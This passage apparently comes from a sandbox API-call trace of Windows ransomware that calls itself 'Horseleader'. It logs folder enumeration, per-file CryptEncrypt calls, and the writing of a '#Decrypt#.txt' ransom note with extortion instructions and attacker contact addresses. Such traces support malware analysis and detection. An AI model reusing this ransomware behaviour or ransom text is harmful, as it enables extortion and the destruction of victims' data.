Files\\Microsoft Shared\\ink\\he-IL\\..") returned 63 [0233.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.890] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned 76 [0233.890] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.890] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.890] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.890] lstrlenW (lpString=".testttjffg") returned 11 [0233.890] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.891] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.891] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.891] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\#Decrypt#.txt") returned 74 [0233.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.891] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.891] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.893] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.893] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.893] CloseHandle (hObject=0x158) returned 1 [0233.893] GetProcessHeap () returned 0x780000 [0233.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.893] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0233.893] lstrcmpiW (lpString1="hr-HR", lpString2="Windows") returned -1 [0233.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 60 [0233.893] lstrcmpW (lpString1="hr-HR", lpString2=".") returned 1 [0233.893] lstrcmpW (lpString1="hr-HR", lpString2="..") returned 1 [0233.893] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.893] GetProcessHeap () returned 0x780000 [0233.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0233.893] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*") returned 62 [0233.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.894] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\.") returned 62 [0233.894] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.894] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\..") returned 63 [0233.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.894] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.895] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned 76 [0233.895] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.895] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.895] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.895] lstrlenW (lpString=".testttjffg") returned 11 [0233.895] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.895] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.895] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.895] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.895] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.895] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\#Decrypt#.txt") returned 74 [0233.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.896] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.896] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.897] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.897] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.897] CloseHandle (hObject=0x158) returned 1 [0233.898] GetProcessHeap () returned 0x780000 [0233.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.898] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0233.898] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0233.898] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 60 [0233.898] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0233.898] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0233.898] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.898] GetProcessHeap () returned 0x780000 [0233.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0233.898] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*") returned 62 [0233.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.899] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\.") returned 62 [0233.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\..") returned 63 [0233.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned 76 [0233.899] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.899] lstrlenW (lpString=".testttjffg") returned 11 [0233.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.902] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.902] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.902] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\#Decrypt#.txt") returned 74 [0233.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.947] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.947] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, 